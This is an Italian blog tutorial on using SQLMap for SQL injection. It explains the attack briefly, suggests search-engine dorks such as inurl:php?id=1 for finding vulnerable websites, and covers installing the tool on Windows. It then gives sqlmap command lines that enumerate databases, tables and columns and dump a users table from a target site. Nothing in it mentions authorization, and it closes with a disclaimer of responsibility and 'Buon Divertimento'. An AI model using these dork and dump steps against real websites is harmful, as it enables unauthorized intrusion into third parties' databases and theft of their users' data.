SQLMap attacco SQL injection
SQLMap è uno strumento di penetrazione test open source che consente di automatizzare il processo di rilevamento e sfruttare i difetti di SQL injection per la presa in consegna del server di un database.
SQLMap supporta in pieno la maggior parte dei database piu’ utilizzati come MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB e HSQLDB.
Supporto per enumerare gli utenti, gli hash delle password, privilegi, ruoli, banche dati, tabelle e colonne, Il riconoscimento automatico dei formati di password hash.
- SQLMap supporta ben 5 differenti tecniche di SQL injection
- boolean-based blind,
- time-based blind,
- error-based,
- UNION query
- stacked queries,
senza considerare la possibilità di integrazione con altri progetti open source come metasploit.
Insomma uno dei migliori software in circolazione per la verifica e l’exploitation delle vulnerabilità di tipo SQL Injenction
Un Sql injection in poche parole è una vulnerabilità dovuta alla mancanza di controlli sui dati ricevuti in input.
Per verificare se un sito web è vulnerabile a questo tipo di attacco è molto semplice, il più delle volte basta inserire un semplice apice (‘) nell’url per ottenere il classico messaggio di errore.
Possiamo usare un modo molto veloce per trovare siti vulnerabili, ovvero quello di usare uno dei tanti motori di ricerca con delle dorks; come ad esempio inurl:php?id=1, oppure SQLi DB tool scritto in C# per cercare attraverso i motori di ricerca come Bing o google siti web vulnerabili da sql injection.
Installare SQLMap su Windows
Per installare (Avviare) SQLMap su windows la prima cosa da fare è scaricare Python 2.7 ed installarlo .
Scaricate adesso SQLMap estrarre SQLMap e rinominare la cartella in ‘SQLMap’ senza apici adesso copiare la cartella SQLMap nella cartella di installazione di Python 2.7 che di solito si trova su C:\Python27

Adesso basta creare un collegamento sul Desktop che punta a SQLMap per avviarlo.
come nome mettiamo SQLMap per comodità e clicchiamo fine.

Adesso possiamo avviare la nostra console con SQLmap
Per iniziare da subito a testare un sito web basta scrivere
sqlmap.py -u "http://www.sitovulnerabile.com/section.php?id=51"
Recuperiamo il Database
sqlmap.py -u "http://www.sitovulnerabile.com/section.php?id=51" --dbs
Trova le tabelle in un database
sqlmap.py -u "http://www.sitovulnerabile.com/section.php?id=51" --tables -D nometabella
Ottenere colonne di una tabella
sqlmap.py -u "http://www.sitovulnerabile.com/section.php?id=51" --columns -D nometabella -T users
Ottenere dati da una tabella
sqlmap.py -u "http://www.sitovulnerabile.com/section.php?id=51" --dump -D nometabella -T users
Qualora avessimo già certezza della tipologia di database utilizzato è possibile specificarlo aggiungendo l’opzione: –dbms MySQL
Tecniche
Come precedentemente accennato, SQLMap supporta ben 5 tecniche di SQL Injection.
Di default vengono provate tutte durante la prima scansione. In alcuni casi è utile testare una o solo alcune di queste tecniche e per farlo si utilizza l’opzione “–technique” seguita dai valori:
B: Boolean-based blind SQL injection
E: Error-based SQL injection
U: UNION query SQL injection
S: Stacked queries SQL injection
T: Time-based blind SQL injection
Il precedente comando diventerà dunque:
sqlmap.py -u “http://testphp.vulnweb.com/listproducts.php?cat=1” -u –threads 10 –dbms Mysql -D nometabella –tables
Questa guida è a puro scopo informativo su come la sicurezza sul web non sia poi granchè quindi non mi assumo nessuna responsabilità dell’uso che ne fai.
Buon Divertimento.
Lascia un commento
Devi essere connesso per inviare un commento.